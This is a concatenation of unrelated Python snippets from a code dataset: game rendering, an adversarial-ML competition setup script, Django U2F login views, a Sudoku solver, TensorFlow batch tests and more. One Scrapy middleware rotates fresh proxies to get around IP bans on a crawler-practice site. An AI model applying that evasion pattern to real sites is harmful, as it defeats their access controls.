        # blit the contents of "panel" to the root console
        self.root.blit(self.console, self.origin.X, self.origin.Y, self.width, self.height, self.target.X,
                       self.target.Y)

    def set_camera(self, camera_width, camera_height, map_width, map_height):
        self.map_width = map_width
        self.map_height = map_height
        self.camera_height = camera_height
        self.camera_width = camera_width

    def move_camera(self, target_coord):
        """Center the camera on *target_coord*, clamped to the map bounds."""
        # new camera coordinates (top-left corner of the screen relative to the map)
        x = target_coord.X - self.camera_width // 2  # coordinates so that the target is at the center of the screen
        y = target_coord.Y - self.camera_height // 2
        # make sure the camera doesn't see outside the map.
        # Bug fix: the original clamp read `x = 0 if x < 0 else y`, which
        # overwrote x with y whenever x was already non-negative.
        x = max(x, 0)
        y = max(y, 0)
        if x >= self.map_width - self.camera_width - 1:
            x = self.map_width - self.camera_width - 1
        if y >= self.map_height - self.camera_height - 1:
            y = self.map_height - self.camera_height - 1
        if Vector2(x, y) != self.camera_coord:
            self.fov_recompute = True
        self.camera_coord = Vector2(x, y)

    def render_all_objects(self):
        """Recompute FOV if needed, draw the map and every visible object."""
        player = self.object_pool.get_player()
        # TODO(review): debug overlay is hard-coded on; gate behind a setting.
        debug = True
        self.move_camera(player.coord)
        if debug:
            self.console.draw_str(0, 0, "{}/{}".format(self.camera_coord, player.coord))
        if self.fov_must_recompute():
            # recompute FOV if needed (the player moved or something)
            self.console.clear(fg=Colors.white, bg=Colors.black)
            self.reset_fov_recompute()
            self.visible_tiles = tdl.map.quickFOV(
                player.coord.X,
                player.coord.Y,
                self.map.is_visible_tile,
                fov=self.fov_algorithm,
                radius=player.torch,
                lightWalls=self.fov_light_walls
            )
            self.map.set_visible_tiles(self.visible_tiles)
        if self.map:
            self.map.draw(self.console, self)
        if self.object_pool and self.object_pool.get_objects_as_list():
            # Draw in z-index order so higher objects end up on top.
            sorted_objects_list = sorted(self.object_pool.get_objects_as_list(), key=lambda x: x.z_index, reverse=False)
            for obj in sorted_objects_list:
                if (obj.coord.X, obj.coord.Y) in self.visible_tiles:
                    obj.draw(self.console, self.camera_offset)
        if self.object_pool.get_player():
            player = self.object_pool.get_player()
            player.draw(self.console, self.camera_offset)
        self.root.blit(self.console, self.origin.X, self.origin.Y, self.width, self.height, self.target.X,
                       self.target.Y)

    def camera_offset(self, obj_coord):
        """Convert map coordinates to screen coordinates, or None when off-camera."""
        # convert coordinates on the map to coordinates on the screen
        coord = obj_coord - self.camera_coord
        # Bug fix: the Y axis was bounded by camera_width (copy-paste error);
        # it must be bounded by camera_height.
        # NOTE(review): `or` (not `and`) and the exclusive `0 <` bounds are
        # kept exactly as the original behaved -- confirm intent.
        if 0 < coord.X < self.camera_width or 0 < coord.Y < self.camera_height:
            return coord
        return None

    def clear_all_objects(self):
        """Erase every pooled object from the console (pre-redraw cleanup)."""
        if self.object_pool:
            for obj in self.object_pool.get_objects_as_list():
                obj.clear(self.console, self.camera_offset)

    def add_message_console(self, message_width, message_height, message_origin_x, message_origin_y):
        """Configure the message log area and register as the global message handler."""
        Messenger.message_handler = self
        self.game_msg = []
        self.message_width = message_width
        self.message_height = message_height
        self.message_origin_x = message_origin_x
        self.message_origin_y = message_origin_y

    def send_message(self, new_msg, color=Colors.white):
        """Append *new_msg* to the log, wrapping lines and evicting old ones."""
        # split the message if necessary, among multiple lines
        new_msg_lines = textwrap.wrap(new_msg, self.message_width)
        for line in new_msg_lines:
            # if the buffer is full, remove the first line to make room for the new one
            if len(self.game_msg) == self.message_height:
                self.game_msg = self.game_msg[1:]
            # add the new line as a tuple, with the text and the color
            self.game_msg.append((line, color))
| StarcoderdataPython |
1789352 | import os
import shutil
import subprocess
# Destination competition checkout, local metafile cache, and run config.
DEST="/home/ubuntu/cleverhans/examples/nips17_adversarial_competition"
META_DIR = "/home/ubuntu/adversarial_attack/metafiles"
CONFIG_DIR = "config.csv"
class bcolors:
    """ANSI escape sequences for coloring terminal output."""

    # Foreground colors.
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'

    # Text attributes.
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'

    # Reset everything back to the terminal default.
    ENDC = '\033[0m'
# organize the files based on config.csv: line 0 = attacks, line 1 = targeted
# attacks, line 2 = defenses (comment lines start with '#').
all_content = open(CONFIG_DIR).readlines()
all_content = [x.strip() for x in all_content if x[0] != "#"]
attacks = all_content[0].split(",")
attacks_target = all_content[1].split(",")
defenses = all_content[2].split(",")
# remove any previously-copied sample folders in the destination checkout
for e_folder in ["sample_attacks", "sample_defenses", "sample_targeted_attacks"]:
    folder_dir = os.path.join(DEST, e_folder)
    try:
        shutil.rmtree(folder_dir)
    except:
        print(bcolors.WARNING + "Folder" + folder_dir + " have already been removed." + bcolors.ENDC)
# copy the local folders (only those selected in config.csv) into the destination
for e_folder in ["sample_attacks", "sample_defenses", "sample_targeted_attacks"]:
    folder_dir = os.path.join(DEST, e_folder)
    os.makedirs(folder_dir)
    for e_subfolder in os.listdir(e_folder):
        orig_folder = os.path.join(e_folder, e_subfolder)
        dest_folder = os.path.join(folder_dir, e_subfolder)
        if os.path.isfile(orig_folder):
            print(bcolors.OKBLUE + "Copy file:" + bcolors.ENDC + orig_folder + " to destination folder:" + dest_folder)
            shutil.copy2(orig_folder, dest_folder)
        elif e_subfolder in attacks + attacks_target + defenses:
            print(bcolors.OKBLUE + "Copy folder:" + bcolors.ENDC + orig_folder + " to destination folder:" + dest_folder)
            shutil.copytree(orig_folder, dest_folder)
# copy model/checkpoint files (everything not starting with "meta") into every
# attack and targeted-attack submission folder
for efile in os.listdir(META_DIR):
    if efile.startswith("meta"):
        continue
    efile_dir = os.path.join(META_DIR, efile)
    for e_folder in ["sample_attacks", "sample_targeted_attacks"]:
        for e_subfolder in os.listdir(os.path.join(DEST, e_folder)):
            # NOTE(review): isfile() is called on the bare name, not the full
            # path, so this test is likely always False here -- confirm.
            if not os.path.isfile(e_subfolder) :
                dest_sub_dir = os.path.join(DEST, e_folder, e_subfolder)
                shutil.copy2(efile_dir, dest_sub_dir)
# install the matching metadata.json template into each submission folder
folder_dict = {"sample_attacks": "attack", "sample_targeted_attacks": "target", "sample_defenses": "defense"}
for e_folder in folder_dict.keys():
    for e_subfolder in os.listdir(os.path.join(DEST, e_folder)):
        e_subpath = os.path.join(DEST, e_folder, e_subfolder)
        if not os.path.isfile(e_subpath) :
            dest_dir = os.path.join(e_subpath, "metadata.json")
            efile_dir = os.path.join(META_DIR, "metadata_" + folder_dict[e_folder] + ".json")
            shutil.copyfile(efile_dir, dest_dir)
# make the run scripts executable
for e_folder in ["sample_attacks", "sample_targeted_attacks", "sample_defenses"]:
    for e_subfolder in os.listdir(os.path.join(DEST, e_folder)):
        dest_sub_dir = os.path.join(DEST, e_folder, e_subfolder)
        if not os.path.isfile(dest_sub_dir) :
            for mod_file in os.listdir(dest_sub_dir):
                if mod_file in ["run_defense.sh", "run_attack.sh"]:
                    mod_dir = os.path.join(dest_sub_dir, mod_file)
                    # 0o... octal literals are only supported by python 3
                    print(bcolors.OKBLUE + "Change file mode for:" + bcolors.ENDC + mod_dir)
                    os.chmod(mod_dir, 0o777)
# run the defense and attack
subprocess.call(['/home/ubuntu/cleverhans/examples/nips17_adversarial_competition/run_attacks_and_defenses.sh'])
| StarcoderdataPython |
3321311 | from model.group import Group
def test_modify_first_group_name(app):
    """Rename the first group, creating one first when the list is empty."""
    if not app.group.count():
        app.group.create(Group(name="test"))
    app.group.modify_first_group(Group(name="New group"))
def test_modify_first_group_header(app):
    """Change the header of the first group, creating one first when needed."""
    if not app.group.count():
        app.group.create(Group(name="test"))
    app.group.modify_first_group(Group(header="New header"))
| StarcoderdataPython |
1743585 | <filename>mfa/U2F.py
from u2flib_server.u2f import (begin_registration, begin_authentication,
complete_registration, complete_authentication)
from cryptography import x509
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.serialization import Encoding
from django.shortcuts import render
import simplejson
#from django.template.context import RequestContext
from django.template.context_processors import csrf
from django.conf import settings
from django.http import HttpResponse
from .models import *
from .views import login
import datetime
from django.utils import timezone
def recheck(request):
    """Render the U2F recheck page with a fresh sign challenge for the current user."""
    context = csrf(request)
    context["mode"]="recheck"
    # sign() builds a U2F challenge; keep the server half in the session and
    # hand the client half to the template.
    s = sign(request.user.username)
    request.session["_u2f_challenge_"] = s[0]
    context["token"] = s[1]
    request.session["mfa_recheck"]=True
    return render(request,"U2F/recheck.html", context)
def process_recheck(request):
    """Handle the U2F recheck response; on success stamp the session and ack."""
    result = validate(request, request.user.username)
    if result == True:
        import time
        # Record when the recheck happened so the next one can be scheduled.
        request.session["mfa"]["rechecked_at"] = time.time()
        payload = simplejson.dumps({"recheck": True})
        return HttpResponse(payload, content_type="application/json")
    # validate() returned an error/redirect response; pass it straight through.
    return result
def check_errors(request, data):
    """Map a U2F client errorCode to a result.

    Returns True when there is no error (code 0, an unknown code, or no code
    at all), an error response for code 4 (invalid key), or a fresh auth page
    for code 1 (retry).
    """
    code = data.get("errorCode")
    if code == 4:
        return HttpResponse("Invalid Security Key")
    if code == 1:
        return auth(request)
    return True
def validate(request,username):
    """Verify a U2F sign response against the stored challenge.

    On success, records last_used on the matching key, marks the session's
    MFA state verified (with an optional randomized recheck deadline), and
    returns True. Client-reported errors are delegated to check_errors().
    """
    import datetime, random
    data = simplejson.loads(request.POST["response"])
    res= check_errors(request,data)
    if res!=True:
        return res
    # The challenge was stored by auth()/recheck(); pop so it is single-use.
    challenge = request.session.pop('_u2f_challenge_')
    device, c, t = complete_authentication(challenge, data, [settings.U2F_APPID])
    # Look the key up by the public key embedded in its JSON properties.
    key=User_Keys.objects.get(username=username,properties__shas="$.device.publicKey=%s"%device["publicKey"])
    key.last_used=timezone.now()
    key.save()
    mfa = {"verified": True, "method": "U2F","id":key.id}
    if getattr(settings, "MFA_RECHECK", False):
        # Schedule the next recheck at a randomized future timestamp.
        mfa["next_check"] = datetime.datetime.timestamp((datetime.datetime.now()
                                                         + datetime.timedelta(
                    seconds=random.randint(settings.MFA_RECHECK_MIN, settings.MFA_RECHECK_MAX))))
    request.session["mfa"] = mfa
    return True
def auth(request):
    """Render the U2F authentication page with a fresh signing challenge.

    Stores the challenge in the session so ``validate`` can complete it
    later, and exposes the client-side challenge data to the template as
    ``token``.
    """
    context = csrf(request)
    challenge, client_data = sign(request.session["base_username"])
    request.session["_u2f_challenge_"] = challenge
    context["token"] = client_data
    # Bug fix: the context (CSRF token + challenge "token") was built but
    # never passed to render(), so the template could not start the U2F flow.
    return render(request, "U2F/Auth.html", context)
def start(request):
    """Begin U2F key enrollment and render the registration page."""
    registration = begin_registration(settings.U2F_APPID, [])
    request.session['_u2f_enroll_'] = registration.json
    context = csrf(request)
    context["token"] = simplejson.dumps(registration.data_for_client)
    context.update(get_redirect_url())
    return render(request, "U2F/Add.html", context)
def bind(request):
    """Complete U2F enrollment: verify the attestation and store the key.

    Rejects a key whose attestation certificate hash has been registered
    before, and replaces any existing U2F keys for the current user.
    """
    import hashlib
    enroll = request.session['_u2f_enroll_']
    data=simplejson.loads(request.POST["response"])
    device, cert = complete_registration(enroll, data, [settings.U2F_APPID])
    # Hash the attestation certificate to detect re-registration of the same key.
    cert = x509.load_der_x509_certificate(cert, default_backend())
    cert_hash=hashlib.md5(cert.public_bytes(Encoding.PEM)).hexdigest()
    q=User_Keys.objects.filter(key_type="U2F", properties__icontains= cert_hash)
    if q.exists():
        return HttpResponse("This key is registered before, it can't be registered again.")
    # Each user keeps at most one U2F key: drop any previous ones.
    User_Keys.objects.filter(username=request.user.username,key_type="U2F").delete()
    uk = User_Keys()
    uk.username = request.user.username
    uk.owned_by_enterprise = getattr(settings, "MFA_OWNED_BY_ENTERPRISE", False)
    uk.properties = {"device":simplejson.loads(device.json),"cert":cert_hash}
    uk.key_type = "U2F"
    uk.save()
    return HttpResponse("OK")
def sign(username):
    """Build a U2F sign challenge over all of *username*'s registered keys.

    Returns ``[challenge_json, client_data_json]``.
    """
    devices = [
        key.properties["device"]
        for key in User_Keys.objects.filter(username=username, key_type="U2F")
    ]
    challenge = begin_authentication(settings.U2F_APPID, devices)
    return [challenge.json, simplejson.dumps(challenge.data_for_client)]
def verify(request):
    """Finish U2F login: validate the response, then log the user in."""
    outcome = validate(request, request.session["base_username"])
    if outcome is True:
        return login(request)
    return outcome
| StarcoderdataPython |
25659 | <gh_stars>1-10
import matplotlib.pyplot as plt
fig, ax = plt.subplots()
# Centered text artist used to echo the details of the most recent mouse event.
text = ax.text(0.5, 0.5, 'event', ha='center', va='center', fontdict={'size': 20})
def call_back(event):
    """Show the mouse event's name, button and coordinates in the text artist.

    Handles button press/release and motion events. Events that occur outside
    the axes carry no data coordinates and are ignored.
    """
    if event.xdata is None or event.ydata is None:
        # Cursor is outside the axes: int(None) would raise TypeError.
        return
    # Fixed the format string: xdata/ydata were printed without a separator.
    info = 'name:{}\n button:{}\n x,y:{},{}\n xdata,ydata:{},{}'.format(
        event.name, event.button, event.x, event.y,
        int(event.xdata), int(event.ydata))
    text.set_text(info)
    fig.canvas.draw_idle()
# Route press, release and motion events to the same handler.
fig.canvas.mpl_connect('button_press_event', call_back)
fig.canvas.mpl_connect('button_release_event', call_back)
fig.canvas.mpl_connect('motion_notify_event', call_back)
plt.show()
| StarcoderdataPython |
3293480 | <reponame>LZC6244/scrapy_ddiy<gh_stars>1-10
# -*- coding: utf-8 -*-
import os
import requests
from time import sleep
from scrapy import signals
from twisted.internet import defer
from twisted.internet.error import (
ConnectError,
ConnectionDone,
ConnectionLost,
ConnectionRefusedError,
DNSLookupError,
TCPTimedOutError,
TimeoutError,
)
from scrapy.exceptions import IgnoreRequest
from twisted.web.client import ResponseFailed
from scrapy.core.downloader.handlers.http11 import TunnelError
class GlidedSkyMiddleware(object):
    """Downloader middleware for glidedsky.com scraping challenges.

    Injects the stored login cookie into every request, optionally rotates
    proxies fetched from an external proxy server, and closes the spider as
    soon as the session cookie stops working.
    """
    # Set in from_crawler / spider_opened.
    cookies: dict
    proxy_server_url: str
    interval_get_proxy: int
    EXCEPTIONS_TO_RETRY = (defer.TimeoutError, TimeoutError, DNSLookupError,
                           ConnectionRefusedError, ConnectionDone, ConnectError,
                           ConnectionLost, TCPTimedOutError, ResponseFailed,
                           IOError, TunnelError)

    def __init__(self):
        self.glided_sky_cookie_set_name = 'glided_sky_cookie'
        self.glided_sky_enable_proxy = False
        # Dedicated to the GlidedSky IP anti-crawl challenges 1 and 2.
        self.used_proxy_set = set()
        self.proxies_li = []
        self.retry_http_codes = {500, 502, 503, 504, 522, 524, 408, 429, 403}

    @classmethod
    def from_crawler(cls, crawler):
        # This method is used by Scrapy to create your spiders.
        s = cls()
        settings = crawler.settings
        if settings.getbool('GLIDED_SKY_ENABLE_PROXY'):
            # Proxy server URL may come from settings or the environment.
            proxy_server_url = settings.get('PROXY_SERVER_URL') or os.environ.get('PROXY_SERVER_URL')
            if not proxy_server_url:
                raise AttributeError('Please set the [ PROXY_SERVER_URL ] for the spider')
            setattr(s, 'proxy_server_url', proxy_server_url)
            setattr(s, 'glided_sky_enable_proxy', True)
            setattr(s, 'interval_get_proxy', settings.get('INTERVAL_GET_PROXY', 15))
        crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
        return s

    def get_proxy(self):
        """Fetch a whitespace-separated batch of proxies from the proxy server."""
        r = requests.get(self.proxy_server_url)
        return r.text.split()

    def set_proxy(self, request, spider):
        """Pick an unused proxy and attach it to the request's meta.

        Blocks (sleeping interval_get_proxy seconds between attempts) until a
        proxy whose IP has not been used before becomes available.
        """
        while not self.proxies_li:
            proxies_li = self.get_proxy()
            spider.logger.info('获取一批未检查代理完成 ...')
            for p in proxies_li:
                ip = p.split(':')[0]
                if ip not in self.used_proxy_set:
                    self.proxies_li.append(p)
            if not self.proxies_li:
                spider.logger.info(f'暂时获取不到未被封禁的 IP ,等待 {self.interval_get_proxy} 秒重新获取')
                sleep(self.interval_get_proxy)
        proxy = self.proxies_li.pop()
        proxy_ip = proxy.split(':')[0]
        scheme = request.url.split('://')[0]
        request.meta['proxy'] = f'{scheme}://{proxy}'
        spider.logger.info(f'Use proxy => {proxy_ip}')
        self.used_proxy_set.add(proxy_ip)

    def spider_opened(self, spider):
        """Load the session cookie from Redis; fail fast when it is absent."""
        glidedsky_session = spider.redis_cli.get(self.glided_sky_cookie_set_name)
        if not glidedsky_session:
            raise ValueError(f'[ {self.glided_sky_cookie_set_name} ] not exists')
        self.cookies = {'glidedsky_session': glidedsky_session.decode()}

    def process_request(self, request, spider):
        request.cookies = self.cookies
        if self.glided_sky_enable_proxy and request.meta.get('set_proxy'):
            self.set_proxy(request, spider)

    def process_response(self, request, response, spider):
        """Close the spider once the login cookie has expired.

        Because this inspects the parsed response body, the middleware's
        order number must be below 590 (Scrapy's default
        'scrapy.downloadermiddlewares.httpcompression.HttpCompressionMiddleware': 590).
        process_request runs in ascending order, process_response in
        descending order.
        """
        if '/login' in response.url or '/login' in response.xpath('//title/text()').get(''):
            spider.crawler.engine.close_spider(spider, 'cookie invalid')
            raise IgnoreRequest
        return response

    def process_exception(self, request, exception, spider):
        if self.glided_sky_enable_proxy and request.meta.get('set_proxy') and \
                isinstance(exception, self.EXCEPTIONS_TO_RETRY):
            # Swallow all retryable network errors and retry with a fresh
            # proxy (IP anti-crawl challenge).
            self.set_proxy(request, spider)
            request.dont_filter = True
            return request
| StarcoderdataPython |
183380 | <filename>SSolver.py
# 9x9 Sudoku puzzle solved in place by solve(); 0 marks an empty cell.
board = [[7,8,0,4,0,0,1,2,0],
         [6,0,0,0,7,5,0,0,9],
         [0,0,0,6,0,1,0,7,8],
         [0,0,7,0,4,0,2,6,0],
         [0,0,1,0,5,0,9,3,0],
         [9,0,4,0,6,0,0,0,5],
         [0,7,0,3,0,0,0,1,2],
         [1,2,0,0,0,7,4,0,0],
         [0,4,9,2,0,6,0,0,7]]
def solve():
    """Solve the module-level ``board`` in place via backtracking.

    Returns True once every cell holds a valid digit, False when the current
    partial assignment admits no solution. (The previous docstring wrongly
    claimed the board was taken as a parameter; it is the module global.)
    """
    for y in range(9):
        for x in range(9):
            if board[y][x] == 0:
                for candidate in range(1, 10):
                    if checkValid(x, y, candidate):
                        board[y][x] = candidate
                        if solve():
                            return True
                        board[y][x] = 0  # backtrack
                return False
    # No empty cell found: the board is complete.  (This also makes the old
    # redundant up-front checkBoard() call unnecessary.)
    return True
def checkBoard():
    """Return True when no cell on the board is empty (zero)."""
    return all(cell != 0 for row in board for cell in row)
def checkValid(x, y, val):
    """Return True if placing *val* at column *x*, row *y* breaks no Sudoku rule.

    Checks the row, the column, and the enclosing 3x3 box of ``board``.
    (The original used bare string literals as comments -- which are
    statements, not comments -- and a convoluted band check split across
    csx(); this is the equivalent direct box scan.)
    """
    # Row must not already contain val.
    if val in board[y]:
        return False
    # Column must not already contain val.
    for row in board:
        if row[x] == val:
            return False
    # The 3x3 box containing (x, y) must not contain val.  Cells sharing the
    # row or column were already rejected above, so rechecking them is
    # harmless.
    bx, by = 3 * (x // 3), 3 * (y // 3)
    for j in range(by, by + 3):
        for i in range(bx, bx + 3):
            if board[j][i] == val:
                return False
    return True
def csx(x, y, val):
    """Return True when *val* is absent from the two box-neighbour columns of *x* in row *y*.

    Helper for the 3x3-box check: given a column x, the other two columns of
    its 3-wide band are inspected in row y.
    """
    if x in (0, 3, 6):
        cols = (x + 1, x + 2)
    elif x in (1, 4, 7):
        cols = (x - 1, x + 1)
    else:
        cols = (x - 1, x - 2)
    return board[y][cols[0]] != val and board[y][cols[1]] != val
def printBoard():
    """Print the board, one row (as a list) per line."""
    for row in board:
        print(row)
# Solve the puzzle in place; print the result only if a solution exists.
if (solve()):
    printBoard()
| StarcoderdataPython |
3343470 | <gh_stars>0
# -*- coding: utf-8 -*-
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for `tf.data.Dataset.batch()`."""
import time
from absl.testing import parameterized
import numpy as np
from tensorflow.python import pywrap_sanitizers
from tensorflow.python.checkpoint import checkpoint as trackable_utils
from tensorflow.python.checkpoint import checkpoint_management
from tensorflow.python.data.experimental.ops import random_access
from tensorflow.python.data.kernel_tests import checkpoint_test_base
from tensorflow.python.data.kernel_tests import test_base
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.ops import options as options_lib
from tensorflow.python.data.util import nest
from tensorflow.python.framework import combinations
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops.ragged import ragged_concat_ops
from tensorflow.python.ops.ragged import ragged_factory_ops
from tensorflow.python.ops.ragged import ragged_math_ops
from tensorflow.python.ops.ragged import ragged_tensor
from tensorflow.python.platform import test
class BatchTest(test_base.DatasetTestBase, parameterized.TestCase):
  """Functional tests for `tf.data.Dataset.batch()` across element types."""

  @combinations.generate(
      combinations.times(
          test_base.default_test_combinations(),
          combinations.combine(
              count=[0, 28],
              batch_size=[14, 15],
              drop_remainder=[True, False],
              num_parallel_calls=[None, 1, 2, 4])))
  def testBasic(self, count, batch_size, drop_remainder, num_parallel_calls):
    """Tests the batch dataset logic for various input configurations.

    Args:
      count: the number of input elements
      batch_size: the batch size
      drop_remainder: whether a smaller batch size should be produced if batch
        size does not divide number of inputs evenly
      num_parallel_calls: the number batches to process asynchronously in
        parallel
    """
    # The pipeline is TensorSliceDataset -> MapDataset(square_3) ->
    # RepeatDataset(count) -> BatchDataset(batch_size).
    components = (np.arange(7),
                  np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
                  np.array(37.0) * np.arange(7))

    def _map_fn(x, y, z):
      return math_ops.square(x), math_ops.square(y), math_ops.square(z)

    dataset = dataset_ops.Dataset.from_tensor_slices(components).map(
        _map_fn).repeat(count).batch(batch_size, drop_remainder,
                                     num_parallel_calls)
    get_next = self.getNext(dataset)
    # With drop_remainder the static batch dimension is known; otherwise None.
    if drop_remainder:
      dim0 = batch_size
    else:
      dim0 = None
    self.assertEqual(
        [ts.as_list() for ts in nest.flatten(
            dataset_ops.get_legacy_output_shapes(dataset))],
        [[dim0] + list(c.shape[1:]) for c in components])
    num_full_batches = (count * 7) // batch_size
    for i in range(num_full_batches):
      result = self.evaluate(get_next())
      for component, result_component in zip(components, result):
        for j in range(batch_size):
          self.assertAllEqual(component[(i * batch_size + j) % 7]**2,
                              result_component[j])
    if not drop_remainder and (count * 7) % batch_size > 0:
      result = self.evaluate(get_next())
      for component, result_component in zip(components, result):
        for j in range((count * 7) % batch_size):
          self.assertAllEqual(
              component[(num_full_batches * batch_size + j) % 7]**2,
              result_component[j])
    with self.assertRaises(errors.OutOfRangeError):
      result = self.evaluate(get_next())

  @combinations.generate(test_base.default_test_combinations())
  def testInvalidBatchSize(self):
    with self.assertRaises(errors.InvalidArgumentError):
      dataset = (dataset_ops.Dataset.range(10).batch(0))
      self.evaluate(dataset._variant_tensor)

  @combinations.generate(test_base.default_test_combinations())
  def testDataset(self):

    def map_fn(i):
      return dataset_ops.Dataset.from_tensors(i)

    dataset = dataset_ops.Dataset.range(10).map(map_fn).batch(5)
    dataset = dataset.map(lambda x: x)
    dataset = dataset.unbatch().flat_map(lambda x: x)
    self.assertDatasetProduces(dataset, expected_output=range(10))

  # NOTE(review): unlike the other tests in this class, this one carries no
  # @combinations.generate decorator -- confirm whether that is intentional.
  def testSparse(self):

    def _sparse(i):
      return sparse_tensor.SparseTensorValue(
          indices=[[0]], values=(i * [1]), dense_shape=[1])

    dataset = dataset_ops.Dataset.range(10).map(_sparse).batch(5)
    expected_output = [
        sparse_tensor.SparseTensorValue(
            indices=[[0, 0], [1, 0], [2, 0], [3, 0], [4, 0]],
            values=[i * 5, i * 5 + 1, i * 5 + 2, i * 5 + 3, i * 5 + 4],
            dense_shape=[5, 1]) for i in range(2)
    ]
    self.assertDatasetProduces(dataset, expected_output=expected_output)

  @combinations.generate(test_base.default_test_combinations())
  def testSparseWithDifferentDenseShapes(self):

    def _sparse(i):
      return sparse_tensor.SparseTensorValue(
          indices=array_ops.expand_dims(
              math_ops.range(i, dtype=dtypes.int64), 1),
          values=array_ops.fill([math_ops.cast(i, dtypes.int32)], i),
          dense_shape=[i])

    dataset = dataset_ops.Dataset.range(10).map(_sparse).batch(5)
    expected_output = []
    for i in range(2):
      expected_indices = []
      expected_outputs = []
      for j in range(5):
        for k in range(i * 5 + j):
          expected_indices.append([j, k])
          expected_outputs.append(i * 5 + j)
      expected_output.append(
          sparse_tensor.SparseTensorValue(
              indices=expected_indices,
              values=expected_outputs,
              dense_shape=[5, (i + 1) * 5 - 1]))
    self.assertDatasetProduces(dataset, expected_output=expected_output)

  @combinations.generate(test_base.default_test_combinations())
  def testSparseNested(self):

    def _sparse(i):
      return sparse_tensor.SparseTensorValue(
          indices=[[0]], values=(i * [1]), dense_shape=[1])

    dataset = dataset_ops.Dataset.range(10).map(_sparse).batch(5).batch(2)
    expected_output = [
        sparse_tensor.SparseTensorValue(
            indices=[[0, 0, 0], [0, 1, 0], [0, 2, 0], [0, 3, 0], [0, 4, 0],
                     [1, 0, 0], [1, 1, 0], [1, 2, 0], [1, 3, 0], [1, 4, 0]],
            values=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9],
            dense_shape=[2, 5, 1])
    ]
    self.assertDatasetProduces(dataset, expected_output=expected_output)

  @combinations.generate(test_base.default_test_combinations())
  def testShapeError(self):

    def generator():
      yield [1.0, 2.0, 3.0]
      yield [4.0, 5.0, 6.0]
      yield [7.0, 8.0, 9.0, 10.0]

    dataset = (
        dataset_ops.Dataset.from_generator(
            generator, dtypes.float32, output_shapes=[None]).batch(3))
    self.assertDatasetProduces(
        dataset,
        expected_error=(
            errors.InvalidArgumentError,
            r'Cannot batch tensors with different shapes in component 0. First '
            r'element had shape \[3\] and element 2 had shape \[4\].'))

  @combinations.generate(test_base.default_test_combinations())
  def testRagged(self):

    def _ragged(i):
      return ragged_tensor.RaggedTensor.from_tensor(i * [[1]])

    dataset = dataset_ops.Dataset.range(10).map(_ragged).batch(5)
    expected_output = [
        ragged_factory_ops.constant([[[0]], [[1]], [[2]], [[3]], [[4]]]),
        ragged_factory_ops.constant([[[5]], [[6]], [[7]], [[8]], [[9]]])
    ]
    self.assertDatasetProduces(dataset, expected_output=expected_output)

  @combinations.generate(test_base.default_test_combinations())
  def testRaggedWithDifferentShapes(self):
    dataset = dataset_ops.Dataset.range(10).map(ragged_math_ops.range).batch(5)
    expected_output = [
        ragged_concat_ops.stack([ragged_math_ops.range(i) for i in range(5)]),
        ragged_concat_ops.stack(
            [ragged_math_ops.range(i) for i in range(5, 10)])
    ]
    self.assertDatasetProduces(dataset, expected_output=expected_output)

  @combinations.generate(test_base.default_test_combinations())
  def testRaggedNested(self):

    def _ragged(i):
      return ragged_tensor.RaggedTensor.from_tensor(i * [[1]])

    dataset = dataset_ops.Dataset.range(10).map(_ragged).batch(5).batch(2)
    expected_output = [
        ragged_factory_ops.constant([[[[0]], [[1]], [[2]], [[3]], [[4]]],
                                     [[[5]], [[6]], [[7]], [[8]], [[9]]]])
    ]
    self.assertDatasetProduces(dataset, expected_output=expected_output)

  @combinations.generate(test_base.default_test_combinations())
  def testNoneComponent(self):
    dataset = dataset_ops.Dataset.range(10).map(lambda x: (x, None)).batch(
        10).map(lambda x, y: x)
    self.assertDatasetProduces(dataset, expected_output=[list(range(10))])

  @combinations.generate(
      combinations.times(
          test_base.default_test_combinations(),
          combinations.combine(
              local_determinism=[None, True, False],
              global_determinism=[True, False])))
  def testDeterminismConfiguration(self, local_determinism, global_determinism):
    # Per-op determinism overrides the global option when it is not None.
    expect_determinism = local_determinism or (local_determinism is None and
                                               global_determinism)
    elements = list(range(100))

    def dataset_fn(delay_ms):

      def sleep(x):
        time.sleep(delay_ms / 1000)
        return x

      def map_function(x):
        # Delay only element 0 so out-of-order completion is observable.
        if math_ops.equal(x, 0):
          return script_ops.py_func(sleep, [x], x.dtype)
        else:
          return x

      dataset = dataset_ops.Dataset.from_tensor_slices(elements)
      dataset = dataset.map(
          map_function, num_parallel_calls=2, deterministic=local_determinism)
      dataset = dataset.batch(
          batch_size=6, num_parallel_calls=2,
          deterministic=local_determinism).unbatch()
      opts = options_lib.Options()
      opts.deterministic = global_determinism
      dataset = dataset.with_options(opts)
      return dataset

    self.checkDeterminism(dataset_fn, expect_determinism, elements)

  @combinations.generate(test_base.eager_only_combinations())
  def testCheckpointLargeBatches(self):
    if pywrap_sanitizers.is_tsan_enabled():
      self.skipTest('Creating a large buffer causes OOM when using tsan.')
    # Batches of size 512M
    dataset = dataset_ops.Dataset.from_tensors(
        array_ops.ones((64, 1024, 1024), dtype=dtypes.float32)).repeat()
    dataset = dataset.batch(2, num_parallel_calls=5)
    iterator = iter(dataset)
    next(iterator)  # request an element to fill the buffer
    ckpt = trackable_utils.Checkpoint(iterator=iterator)
    manager = checkpoint_management.CheckpointManager(
        ckpt, self.get_temp_dir(), max_to_keep=1)
    manager.save()

  @combinations.generate(
      combinations.times(test_base.default_test_combinations(),
                         combinations.combine(num_parallel_calls=[None, 1])))
  def testName(self, num_parallel_calls):
    dataset = dataset_ops.Dataset.range(5).batch(
